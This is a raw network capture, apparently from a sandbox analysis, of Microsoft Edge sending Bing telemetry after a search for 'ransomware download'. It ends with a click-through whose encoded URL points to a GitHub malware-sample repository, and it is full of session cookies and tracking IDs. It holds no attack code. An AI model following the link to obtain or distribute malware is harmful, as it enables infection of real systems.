accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F834E2D18FAC40AAA6502EB8A8936F05 Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:39Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:39 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220759.b32aba3
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F5C8F6FE8EB44CECBDDDCAE7F35AEFFE Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:40Z
date: Thu, 29 Feb 2024 15:32:40 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220760.b32ae32
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754124%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754323%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754487%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754786%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755095%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754124%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754323%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754487%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754786%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755095%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7973CF536BA546F794A8C4DAB8114FE0 Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:42Z
date: Thu, 29 Feb 2024 15:32:42 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220762.b32be54
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755640%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755696%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755729%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756096%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756162%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756488%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755640%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755696%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755729%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756096%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756162%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756488%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 65e0a39cf7724213927d31a9d352349c
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Gx5/NA/U7UL/3mheVTAiPlaTL74CklZ7yPNR2rT15RU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: AF46B528BC4A4027A34DB039B8D3696B Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:44Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:44 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:44 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220764.b32d113
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 23786
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 1227
content-type: text/html; charset=UTF-8
content-encoding: gzip
expires: Fri, 01 Jan 1990 00:00:00 GMT
vary: Accept-Encoding
access-control-allow-origin: *
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6B4858DA9554467DA15E6B4B9CC9DED8 Ref B: LTSEDGE1912 Ref C: 2024-02-29T15:32:45Z
date: Thu, 29 Feb 2024 15:32:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220765.b32d20c
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 709
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9E073D29587148898D1E805F7A3F8300 Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:45Z
date: Thu, 29 Feb 2024 15:32:45 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220765.b32d2c3
-
POSThttps://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5493.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Dd99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D060b31e3-593a-6070-2c3d-25d75802611a%26psq%3Dransomware%2Bdownload%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl%26ntb%3D1msedge.exeRemote address:92.123.128.152:443RequestPOST /fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5493.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Dd99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D060b31e3-593a-6070-2c3d-25d75802611a%26psq%3Dransomware%2Bdownload%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: USRLOC=HS=1&BLOCK=TS=240229153233
-
GEThttps://www.bing.com/ck/a?!&&p=d99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw&ptn=3&ver=2&hsh=3&fclid=060b31e3-593a-6070-2c3d-25d75802611a&psq=ransomware+download&u=a1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl&ntb=1msedge.exeRemote address:92.123.128.152:443RequestGET /ck/a?!&&p=d99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw&ptn=3&ver=2&hsh=3&fclid=060b31e3-593a-6070-2c3d-25d75802611a&psq=ransomware+download&u=a1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl&ntb=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
